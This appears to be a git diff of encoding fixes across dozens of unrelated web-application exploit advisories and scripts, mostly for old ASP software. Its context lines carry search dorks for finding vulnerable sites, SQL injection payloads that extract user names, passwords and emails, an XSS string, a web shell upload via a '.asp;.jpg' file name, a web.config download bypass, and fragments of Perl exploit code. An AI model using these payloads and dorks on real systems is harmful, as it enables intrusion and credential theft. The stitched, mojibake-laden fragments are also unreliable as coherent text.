[»] Download: [ http://www.aspindir.com/goster/5377]
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com - LionTurk.Turkblog.com }
|
||||
[»] My Home: [ RevengeHack.com & Ar-ge.Org ]
|
||||
[»] N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit And Dork ]===
|
||||
|
||||
[»] http://lionturk.turkblog.com/[dizin]/admin/admin_haber.asp or
|
||||
[»] http://lionturk.turkblog.com/[dizin]/admin/admin_haber.asp or
|
||||
/admin/admin_haber.asp?islem=ekle_kaydet
|
||||
|
||||
Ýn the Admin panel
|
||||
Ýn the Admin panel
|
||||
|
||||
[»] Mesut Manþet Haber
|
||||
[»] Mesut Manþet Haber
|
||||
|
||||
|
||||
Author: LionTurk <-
|
||||
|
||||
- Turk'uz Varmi Otesi?
|
||||
|
||||
Dandirik Scriptler Kullanmayýn.
|
||||
Dandirik Scriptler Kullanmayýn.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
|
|
@ -12,7 +12,7 @@
|
|||
|
||||
** Risk : High
|
||||
|
||||
** Dork : "Diseño Web Hernest Consulting S.L."
|
||||
** Dork : "Diseño Web Hernest Consulting S.L."
|
||||
|
||||
************************************************************
|
||||
|
||||
|
|
|
@ -28,12 +28,12 @@ http://localhost/[path]/controlpanel/
|
|||
|
||||
-------------------------------------------------------------------------------------------
|
||||
|
||||
Öyle bir özlemişim ki seni
|
||||
Artık dönsen de olur dönmesen de
|
||||
Öyle bir özlemişim ki seni
|
||||
Artık dönsen de olur dönmesen de
|
||||
Ben her daim yine sana sitemli yine sana hasret giderim
|
||||
Aziz yar sen bir sabah bu şehri başıma yıkıp gittin
|
||||
Dağları deviriverdin üstüme hiç çekinmedin
|
||||
Ben bu şehirde bir daha da sabah görmedim
|
||||
Günaydınlar olmadı günler aymadı sensiz ........
|
||||
Dağları deviriverdin üstüme hiç çekinmedin
|
||||
Ben bu şehirde bir daha da sabah görmedim
|
||||
Günaydınlar olmadı günler aymadı sensiz ........
|
||||
|
||||
-------------------------------------------------------------------------------------------
|
|
@ -25,5 +25,5 @@
|
|||
**
|
||||
** Greetz to : ALLAH
|
||||
** All Members of http://www.DZ4All.cOm/Cc
|
||||
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n &
|
||||
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n &
|
||||
***********************************************************
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
** Home : N/A
|
||||
** Vunlerability : SQL Injection
|
||||
** Risk : High
|
||||
** Dork : "Sitedesign by: Dieleman www.dieleman.nl - Copyright © 2010"
|
||||
** Dork : "Sitedesign by: Dieleman www.dieleman.nl - Copyright © 2010"
|
||||
************************************************************
|
||||
** Discovred by: Ra3cH
|
||||
** From : Algeria
|
||||
|
|
|
@ -14,7 +14,7 @@ greetz to :All ICW members.
|
|||
###############################################################################################################
|
||||
Description:
|
||||
|
||||
Looking for a Real Estate Listing script? Our Virtual Real Estate Manager was developed in ASP ( Active Server Pages ) and an Access database. End User Features : » Search by Area and type of property » Listings Page includes thumbnail of the property, Short Description, city, date added and price. » Details Page includes - 4 thumbnails that open in a new window with larger view. Heading, Description of the property, Details of the property, email to a friend and request more info. Admin Features : » Add, Edit and Delete Properties - upload images » Add, Edit and Delete Categories » Add, Edit and Delete Area » Change Password VRM : Is delivered via a ZIP file. You receive this exact template with the application. Easy to customize with knowledge of html or one of the following: Design Requirements : Front page - Recommended * Macromedia Dreamweaver Configuration Requirements: Notepad WordPad
|
||||
Looking for a Real Estate Listing script? Our Virtual Real Estate Manager was developed in ASP ( Active Server Pages ) and an Access database. End User Features : » Search by Area and type of property » Listings Page includes thumbnail of the property, Short Description, city, date added and price. » Details Page includes - 4 thumbnails that open in a new window with larger view. Heading, Description of the property, Details of the property, email to a friend and request more info. Admin Features : » Add, Edit and Delete Properties - upload images » Add, Edit and Delete Categories » Add, Edit and Delete Area » Change Password VRM : Is delivered via a ZIP file. You receive this exact template with the application. Easy to customize with knowledge of html or one of the following: Design Requirements : Front page - Recommended * Macromedia Dreamweaver Configuration Requirements: Notepad WordPad
|
||||
|
||||
###############################################################################################################
|
||||
|
||||
|
|
|
@ -4,7 +4,7 @@ Version:1.0
|
|||
Price:$149.97
|
||||
Vendor url:http://dmxready.com/?product=online-notebook-manager
|
||||
Published: 2010-06-09
|
||||
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer,d3c0d3r and to all ICW members
|
||||
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer,d3c0d3r and to all ICW members
|
||||
###############################################################################################################################################################################################
|
||||
|
||||
Online Notebook Manager SQLi Vulnerability
|
||||
|
|
|
@ -33,14 +33,14 @@ Spl Greetz to:inj3ct0r.com Team
|
|||
Description:
|
||||
|
||||
VU Web Visitor Analyst is an application that retrieves your website
|
||||
visitors’ IP address, visited date and time, visited page name, the link a
|
||||
visitors’ IP address, visited date and time, visited page name, the link a
|
||||
visitor came from originally (referred URL address). You can view the single
|
||||
visitor history with the list of all pages visited. You can also display
|
||||
visits by date criteria. The weekly statistics allow you to see the total
|
||||
visits for every single day in the present and last weeks. The monthly
|
||||
statistics allow you viewing the total visits of every month for the whole
|
||||
year. In addition, every visitor is linked to the web database containing
|
||||
personal information about this visitor’s IP address (such as name, address,
|
||||
personal information about this visitor’s IP address (such as name, address,
|
||||
phone, email, etc. if available).
|
||||
Pleasant and professional graphic user interface will make your statistical
|
||||
experience more enjoyable.
|
||||
|
|
|
@ -22,8 +22,8 @@ Sex
|
|||
</select>
|
||||
</p>
|
||||
<p>Avatar :<input type="text" name="icon" size="49" value="icon"></p>
|
||||
<p><EFBFBD></p>
|
||||
<p><EFBFBD></p>
|
||||
<p> </p>
|
||||
<p> </p>
|
||||
|
||||
</form>
|
||||
</frewal>
|
||||
|
|
|
@ -54,7 +54,7 @@ $xpl = LWP::UserAgent->new() or die;
|
|||
$req = HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect.");
|
||||
$res = $xpl->request($req);
|
||||
$r = $res->content;
|
||||
$r =~ tr/[\n]/[鷯/;
|
||||
$r =~ tr/[\n]/[ê]/;
|
||||
|
||||
if (@ARGV[4] eq "-r")
|
||||
{
|
||||
|
|
|
@ -20,7 +20,7 @@ http://address/Portal/Research/ResearchPlan/UserStart.aspx
|
|||
'or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
|
||||
|
||||
====================================================================================
|
||||
Dork: just search for "????"
|
||||
Dork: just search for "سیدا"
|
||||
|
||||
====================================================================================
|
||||
~Blackout Frenzy [http://b0f.ir]
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
===================================================
|
||||
AKY Blog SQL ?njection
|
||||
AKY Blog SQL İnjection
|
||||
===================================================
|
||||
|
||||
Author : Madconfig
|
||||
|
|
|
@ -149,7 +149,7 @@ As a result you can input value for Bypass filters and access critical informati
|
|||
|
||||
After that results will be shown in DataGrid in Page.
|
||||
|
||||
With another value, we can retrieve Information’s of Users:
|
||||
With another value, we can retrieve Information’s of Users:
|
||||
|
||||
AddExtraSQL:1=1/**/Union/**/s;e;l;e;c;t/**/Name,Password,Email,UserID,2,Salt,1/1/1900,3,user,NEWID(),user/**/f;r;o;m/**/rb_users;-;-/**/sp_password
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@ http://cloudscan.blogspot.com/2010/10/vendor-smartertoolscom-smartermail-7x.html
|
|||
########################################################################
|
||||
# Vendor: smartertools.com SmarterMail 7.x (7.2.3925)
|
||||
# Date: 2010-10-01
|
||||
# Author : David Hoyt (sqlhacker) – Hoyt LLC
|
||||
# Author : David Hoyt (sqlhacker) – Hoyt LLC
|
||||
# Contact : h02332@gmail.com
|
||||
# Home : http://cloudscan.me
|
||||
# Dork : insite: SmarterMail Enterprise 7.1
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
########################################################################
|
||||
# Vendor: smartertools.com SmarterMail 7.x (7.2.3925)
|
||||
# Date: 2010-10-01
|
||||
# Author : David Hoyt (sqlhacker) – Hoyt LLC
|
||||
# Author : David Hoyt (sqlhacker) – Hoyt LLC
|
||||
# Contact : h02332@gmail.com
|
||||
# Home : http://cloudscan.me
|
||||
# Dork : insite: SmarterMail Enterprise 7.2
|
||||
|
|
|
@ -10,7 +10,7 @@ TradeMC E-Ticaret - (SQLi/XSS) Multiple Vulnerabilities
|
|||
~Web App. : TradeMC E-Ticaret
|
||||
~Software: http://www.trademc.net/
|
||||
~Vulnerability Style : SQL-i (XSS) Multiple
|
||||
~Google Keywords : "TradeMC Tarafından Hazırlanmıştır"
|
||||
~Google Keywords : "TradeMC Tarafýndan Hazýrlanmýþtýr"
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Meterials : SQLInjection TOOL or Table name Bruteforcer
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
|
|
@ -8,7 +8,7 @@
|
|||
# EDB-ID: 5765 (only 1 SQL injection)
|
||||
|
||||
|
||||
# Ariko-Security: Security Audits , Audyt bezpiecze?stwa
|
||||
# Ariko-Security: Security Audits , Audyt bezpieczeństwa
|
||||
# Advisory: 745/2010
|
||||
|
||||
============ { Ariko-Security - Advisory #1/11/2010 } =============
|
||||
|
|
|
@ -1,26 +1,26 @@
|
|||
==============================================================================
|
||||
|
||||
[»] Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability
|
||||
[»] Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»] Title : [ Acidcat CMS v 3.x (fckeditor) Shell Upload Vulnerability ]
|
||||
[»] Title : [ Acidcat CMS v 3.x (fckeditor) Shell Upload Vulnerability ]
|
||||
|
||||
[»] Script : [ Mini-NUKE v2.3 ]
|
||||
[»] Script : [ Mini-NUKE v2.3 ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Download: [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free]
|
||||
[»] Download: [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free]
|
||||
|
||||
[»] Author : [ Net.Edit0r - black.hat.tm@gmail.com }
|
||||
[»] Author : [ Net.Edit0r - black.hat.tm@gmail.com }
|
||||
|
||||
[»] My Home : [ ajaxtm.com and datacoders.org ]
|
||||
[»] My Home : [ ajaxtm.com and datacoders.org ]
|
||||
|
||||
[»] Date : [ 2010-11-23 ]
|
||||
[»] Date : [ 2010-11-23 ]
|
||||
|
||||
[»] Version : [ 3.3.X and 3.2.x ]
|
||||
[»] Version : [ 3.3.X and 3.2.x ]
|
||||
|
||||
[»] Dork : [ "Powered by Acidcat CMS " ]
|
||||
[»] Dork : [ "Powered by Acidcat CMS " ]
|
||||
|
||||
|
||||
|
||||
|
@ -30,15 +30,15 @@
|
|||
===[ Exploit ]===
|
||||
|
||||
|
||||
[»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp
|
||||
[»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp
|
||||
|
||||
[»] asp renamed via the .asp;.jpg (shell.asp;.jpg)
|
||||
[»] asp renamed via the .asp;.jpg (shell.asp;.jpg)
|
||||
|
||||
===[ Upload To ]===
|
||||
|
||||
[»] http://server/read_write/file/[Shell]
|
||||
[»] http://server/read_write/file/[Shell]
|
||||
|
||||
[»] http://server/public/File/[Shell]
|
||||
[»] http://server/public/File/[Shell]
|
||||
|
||||
|
||||
Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , M4hd1
|
||||
|
|
|
@ -57,7 +57,7 @@ files of the BugTracker.NET:
|
|||
|
||||
6. *Credits*
|
||||
|
||||
This vulnerability was discovered and researched by Damián Saura
|
||||
This vulnerability was discovered and researched by Damián Saura
|
||||
[http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=researcher&name=Damian_Saura]
|
||||
and Alejandro Frydman from Core Security Technologies.
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
# Date: 05-12-2010
|
||||
# Vendor or Software Link: http://www.hotwebscripts.co.uk/
|
||||
# Category:WebApp
|
||||
# Price: £150
|
||||
# Price: £150
|
||||
# Contact: R4dc0re@yahoo.fr
|
||||
# Website: www.1337db.com
|
||||
# Greetings to: R0073r(1337db.com), L0rd CrusAd3r,Sid3^effects and to rest of the 1337db members
|
||||
|
|
|
@ -8,16 +8,16 @@
|
|||
+Tests : Windows XP SP 3 and Backtrack4 any other OS
|
||||
+Discovered by DeadLy DeMon
|
||||
+ Cyber - Warrior TIM =>> *www.cyber-warrior.org*
|
||||
+Greetz to All System-Hacker, BlackApple , F0RTYS3V3N , HUNT3R , ?air-ul
|
||||
+Greetz to All System-Hacker, BlackApple , F0RTYS3V3N , HUNT3R , Şair-ul
|
||||
Cihad and All KinqSqlZCrew
|
||||
Members
|
||||
---------------------------------------------------------------------------------------
|
||||
|
||||
Var m? içinizde beni tan?yan?
|
||||
Ya?anmadan çözülemeyen s?r benim.
|
||||
Kalmasada ?öhretimi duymayan,
|
||||
Kimli?imi tarif etmek zor benim..
|
||||
Akl?n?za Geliriz Akl?n?z Gider...
|
||||
Var mı içinizde beni tanıyan?
|
||||
Yaşanmadan çözülemeyen sır benim.
|
||||
Kalmasada şöhretimi duymayan,
|
||||
Kimliğimi tarif etmek zor benim..
|
||||
Aklınıza Geliriz Aklınız Gider...
|
||||
KinqSqlZ Crew Akar...
|
||||
----------------------------------------------------------------------------------------
|
||||
|
||||
|
|
|
@ -45,7 +45,7 @@ sub exploit ()
|
|||
print $as "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$as>) {
|
||||
if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) {
|
||||
if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) {
|
||||
if ($1 == $ARGV[2]) {
|
||||
print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n";
|
||||
}
|
||||
|
|
|
@ -12,7 +12,7 @@
|
|||
- Soroush Dalili (Irsdl [at] yahoo [dot] com) (secproject.com)
|
||||
|
||||
# Description:
|
||||
Regarding attack technique [1], it is possible to bypass the security protections of ?/download.aspx? in Douran Portal and download the hosted files.
|
||||
Regarding attack technique [1], it is possible to bypass the security protections of /download.aspx in Douran Portal and download the hosted files.
|
||||
|
||||
# PoC(s):
|
||||
Try this first and see the access denied error: http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=web.config&OriginalAttachFileName=secretfile.txt
|
||||
|
@ -22,7 +22,7 @@ http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=web.config%20&Origin
|
|||
http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=wEB.CoNfiG&OriginalAttachFileName=secretfile.txt
|
||||
|
||||
# Reference:
|
||||
[1] Unrestricted File Download V1.0 ? Windows Server, (URL: http://soroush.secproject.com/blog/2011/01/unrestricted_file_download_v1_0/)
|
||||
[1] Unrestricted File Download V1.0 Windows Server, (URL: http://soroush.secproject.com/blog/2011/01/unrestricted_file_download_v1_0/)
|
||||
|
||||
# Important Notes:
|
||||
- Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in the website, we have used all the emails which had been found by searching in Google such as support, info, and so on.
|
||||
|
|
|
@ -7,7 +7,7 @@
|
|||
# Software Link: http://www.element-it.com/downloadfile.aspx?type=pow
|
||||
# Demo:
|
||||
http://site.com/Examples/PowUpload/Simpleupload.htm
|
||||
<EFBFBD>
|
||||
|
||||
[Comment]
|
||||
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
|
||||
Login-Root, KikoArg, Ricota,
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
# Software: EAFlashUpload v 2.5
|
||||
# Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload
|
||||
# Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx
|
||||
<EFBFBD>
|
||||
|
||||
[Comment]
|
||||
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
|
||||
Login-Root, KikoArg, Ricota,
|
||||
|
|
|
@ -27,7 +27,7 @@ e-mail : root[at]exploit-id.com
|
|||
# Category:: webapps
|
||||
# Google dork: http://www.google.com/#q=intext%3A%22Powered+by+dhtml-menu-builder.com%22+inurl%3A.asp%3Fid%3D&hl=en&biw=1280&bih=709&prmd=ivns&ei=xES_TdTxI4-58gPk_ozUBQ&start=20&sa=N&fp=4fb1180a34b58d1d
|
||||
#Vendor: http://dhtml-menu-builder.com
|
||||
# Tested on: [Windows Vista Edition Intégrale]
|
||||
# Tested on: [Windows Vista Edition Intégrale]
|
||||
####
|
||||
|
||||
||>> Special Thanks To: All Exploit-Id Team
|
||||
|
|
|
@ -7,13 +7,13 @@
|
|||
##############################################
|
||||
===[ POC ]===
|
||||
|
||||
[»] http://website/[path]/careers-detail.asp?id=[SQL]
|
||||
[»] http://website/[path]/careers-detail.asp?id=[SQL]
|
||||
|
||||
[»] http://website/[path]/publications.asp?type=[SQL]
|
||||
[»] http://website/[path]/publications.asp?type=[SQL]
|
||||
|
||||
[»] http://website/[path]/WhatNew.asp?page=&id=[SQL]
|
||||
[»] http://website/[path]/WhatNew.asp?page=&id=[SQL]
|
||||
|
||||
[»] http://website/[path]/gallery.asp?cid=[SQL]
|
||||
[»] http://website/[path]/gallery.asp?cid=[SQL]
|
||||
##############################################
|
||||
|
||||
Greats T0 :
|
||||
|
|
|
@ -65,12 +65,12 @@ http://[URL]/archive.aspx?sid=19'; IF SYSTEM_USER='sa' waitfor delay
|
|||
'00:00:10'--&siteid=1
|
||||
|
||||
Binary Search Exploits:
|
||||
http://[URL]/about.aspx?siteid=1'; IF ASCII(SUBSTRING((?),i,1)) > k
|
||||
http://[URL]/about.aspx?siteid=1'; IF ASCII(SUBSTRING((<EFBFBD>),i,1)) > k
|
||||
waitfor delay
|
||||
'00:00:10'--
|
||||
|
||||
Note: In last POC, i is the i-th byte returned by the one-row subquery
|
||||
(?) and k is the
|
||||
(<EFBFBD>) and k is the
|
||||
current middle value of the binary search.
|
||||
|
||||
-------------
|
||||
|
|
|
@ -23,15 +23,15 @@ http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%
|
|||
|
||||
TURKISH
|
||||
# Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
|
||||
# Sözcük[Arama] : "powered by phpmydirectory"
|
||||
# Aç... Bulan : ajann
|
||||
# Aç.k bulunan dosyalar;
|
||||
# Sözcük[Arama] : "powered by phpmydirectory"
|
||||
# Aç... Bulan : ajann
|
||||
# Aç.k bulunan dosyalar;
|
||||
|
||||
SQL INJECT.ON--------------------------------------------------------
|
||||
### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
|
||||
### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken
|
||||
|
||||
Örnek:
|
||||
Örnek:
|
||||
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
|
||||
|
||||
XSS--------------------------------------------------------
|
||||
|
@ -39,7 +39,7 @@ XSS--------------------------------------------------------
|
|||
### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
|
||||
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ
|
||||
|
||||
Örnek:
|
||||
Örnek:
|
||||
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.
|
||||
|
||||
Ac.klama:
|
||||
|
|
|
@ -55,7 +55,7 @@ sub getsession ()
|
|||
print "- Connected...\r\n";
|
||||
while ($answer = <$mns>) {
|
||||
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; }
|
||||
if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
|
||||
if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
|
||||
}
|
||||
#if you are here...
|
||||
die "- Exploit failed\r\n";
|
||||
|
@ -191,7 +191,7 @@ sub doadmin ()
|
|||
print "- You can login with password $mnpass on $mnlreq\r\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /Üyeler Açýktýr/) {
|
||||
if ($answer =~ /Üyeler Açýktýr/) {
|
||||
print "- Exploit failed\r\n";
|
||||
exit();
|
||||
}
|
||||
|
|
|
@ -17,10 +17,10 @@ Mail
|
|||
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>
|
||||
|
||||
<font face="Verdana" size="2" color="#FF0000"><b>User
|
||||
Ýd
|
||||
Ýd
|
||||
: </b></font>
|
||||
<input type="text" name="id" value="" size="20">
|
||||
<font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1
|
||||
<font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1
|
||||
Admin</font><br>
|
||||
<font face="Verdana" size="2" color="#FF0000"><b>User Country :
|
||||
</b>
|
||||
|
|
|
@ -16,16 +16,16 @@ VL-ID:
|
|||
|
||||
Introduction:
|
||||
=============
|
||||
XPhone Unified Communications 2011 ist die leistungsstärkste Telefonie- und Kommunikationslösung von C4B.
|
||||
Sie ist leicht zu bedienen und verbessert die Arbeitsabläufe in Unternehmen. Die Lösung integriert sich
|
||||
XPhone Unified Communications 2011 ist die leistungsstärkste Telefonie- und Kommunikationslösung von C4B.
|
||||
Sie ist leicht zu bedienen und verbessert die Arbeitsabläufe in Unternehmen. Die Lösung integriert sich
|
||||
nahtlos in bestehende Anwendungen und nutzt die vorhandene Telefonanlage und IT-Infrastruktur. Dabei
|
||||
werden die verschiedensten Kommunikationsmittel wie Telefon, Handy, Fax, Voicemail, SMS und Instant Messaging
|
||||
vereint und mit Präsenzinformationen kombiniert. Die Software stellt leistungsfähige Telefonie-Funktionen in
|
||||
vereint und mit Präsenzinformationen kombiniert. Die Software stellt leistungsfähige Telefonie-Funktionen in
|
||||
praktisch allen Anwendungen wie z.B. Microsoft Outlook, Lotus Notes, Warenwirtschaftssystemen (ERP),
|
||||
|
||||
Kundendatenbanken (CRM) oder dem Webbrowser zur Verfügung. Die Verknüpfung von Telefonereignissen mit bestimmten
|
||||
Kundendatenbanken (CRM) oder dem Webbrowser zur Verfügung. Die Verknüpfung von Telefonereignissen mit bestimmten
|
||||
Aktionen, z.B. Starten von Anwendungen, automatische Erstellung von Briefen oder Faxe u.v.m, verbessert die
|
||||
Arbeitsabläufe in Unternehmen spürbar.
|
||||
Arbeitsabläufe in Unternehmen spürbar.
|
||||
|
||||
(Copy of the Vendor Homepage: http://www.c4b.de )
|
||||
|
||||
|
@ -106,7 +106,7 @@ may not apply. Any modified copy or reproduction, including partially usages, of
|
|||
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
|
||||
other media, are reserved by Vulnerability-Lab or its suppliers.
|
||||
|
||||
Copyright © 2012 Vulnerability-Lab
|
||||
Copyright © 2012 Vulnerability-Lab
|
||||
|
||||
--
|
||||
VULNERABILITY RESEARCH LABORATORY TEAM
|
||||
|
|
|
@ -3,13 +3,13 @@
|
|||
#Original advisory: http://www.nukedx.com/?viewdoc=42
|
||||
#Title: MaxiSepet <= 1.0 (link) SQL Injection Vulnerability.
|
||||
|
||||
#Dork: "Copyright MaxiSepet ©"
|
||||
#Dork: "Copyright MaxiSepet ©"
|
||||
|
||||
#How: Parameter link did not sanitized properly.
|
||||
|
||||
#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=SQL
|
||||
|
||||
#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC
|
||||
#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC
|
||||
|
||||
# nukedx.com [2006-06-11]
|
||||
|
||||
|
|
|
@ -150,7 +150,7 @@ retrieve users credential from user database requests
|
|||
\\\
|
||||
.------. ///
|
||||
(:::::::)(_)():-
|
||||
`------ー \\\
|
||||
`------° \\\
|
||||
Exploit sent ///
|
||||
|
||||
'."\n";
|
||||
|
|
|
@ -13,10 +13,10 @@ the protection and upload a file with any extension.
|
|||
|
||||
Note: Quick patch for FCKEditor 2.6.8 File Upload Bypass:
|
||||
|
||||
In “config.asp”, wherever you have:
|
||||
In “config.asp”, wherever you have:
|
||||
|
||||
ConfigAllowedExtensions.Add “File”,”Extensions Here”
|
||||
ConfigAllowedExtensions.Add “File”,”Extensions Here”
|
||||
|
||||
Change it to:
|
||||
|
||||
ConfigAllowedExtensions.Add “File”,”^(Extensions Here)$”
|
||||
ConfigAllowedExtensions.Add “File”,”^(Extensions Here)$”
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
################################################################################
|
||||
## ##
|
||||
## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ##
|
||||
## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ##
|
||||
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
|
||||
## Credit by | Chironex Fleckeri ##
|
||||
## Mail | ChironeX.FleckeriX@Gmail.Com ##
|
||||
|
|
|
@ -31,7 +31,7 @@ print "| |\n";
|
|||
print "| PROOF OF CONCEPT COOKIE ACCOUNT HIJACK |\n";
|
||||
print "| Usage:Asp-POC.pl [host] [directorio] [usuario] [fichero] |\n";
|
||||
print "| |\n";
|
||||
print "| By: Manuel L?pez #IST |\n";
|
||||
print "| By: Manuel L<EFBFBD>pez #IST |\n";
|
||||
print "|____________________________________________________________|\n";
|
||||
print "\n\n";
|
||||
exit(1);
|
||||
|
|
|
@ -1,8 +1,8 @@
|
|||
<!--
|
||||
# Title : Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change Exploit
|
||||
# Author : ajann
|
||||
# Dork : "Forum Active Bulletin Board version 1.1 béta 2"
|
||||
# Greetz : Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :)
|
||||
# Dork : "Forum Active Bulletin Board version 1.1 béta 2"
|
||||
# Greetz : Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :)
|
||||
|
||||
[Code]]]
|
||||
-->
|
||||
|
|
|
@ -10,7 +10,7 @@
|
|||
'[Author : ajann
|
||||
'[Contact : :(
|
||||
'[ExploitName: exploit1.asp
|
||||
'[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur İnsallah ##
|
||||
'[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ##
|
||||
|
||||
'[Note : exploit file name =>exploit1.asp
|
||||
'[Using : Write Target and ID after Submit Click
|
||||
|
|
|
@ -13,9 +13,9 @@
|
|||
|
||||
'[Note : exploit file name =>exploit1.asp
|
||||
'[Using : Write Target and ID after Submit Click
|
||||
'[Using : Tr:Alınan Sifreyi Perl scriptinde cözün.
|
||||
'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün.
|
||||
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz
|
||||
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
|
||||
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
|
||||
'===============================================================================================
|
||||
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke
|
||||
|
||||
|
|
|
@ -17,7 +17,7 @@ vulnerables fields:
|
|||
- Comments
|
||||
|
||||
|
||||
laurent gaffié & benjamin mossé
|
||||
laurent gaffié & benjamin mossé
|
||||
http://s-a-p.ca/
|
||||
contact: saps.audit@gmail.com
|
||||
|
||||
|
|
|
@ -15,7 +15,7 @@ variables:
|
|||
Hpecs_Find=maingroup&searchstring='[sql]
|
||||
( or just post your query in the search engine ... )
|
||||
|
||||
laurent gaffié & benjamin mossé
|
||||
laurent gaffié & benjamin mossé
|
||||
http://s-a-p.ca/
|
||||
contact: saps.audit@gmail.com
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
source: http://www.securityfocus.com/bid/21398/info
|
||||
|
||||
Aspee Ziyaretçi Defteri is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
Aspee Ziyaretçi Defteri is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
source: http://www.securityfocus.com/bid/21511/info
|
||||
|
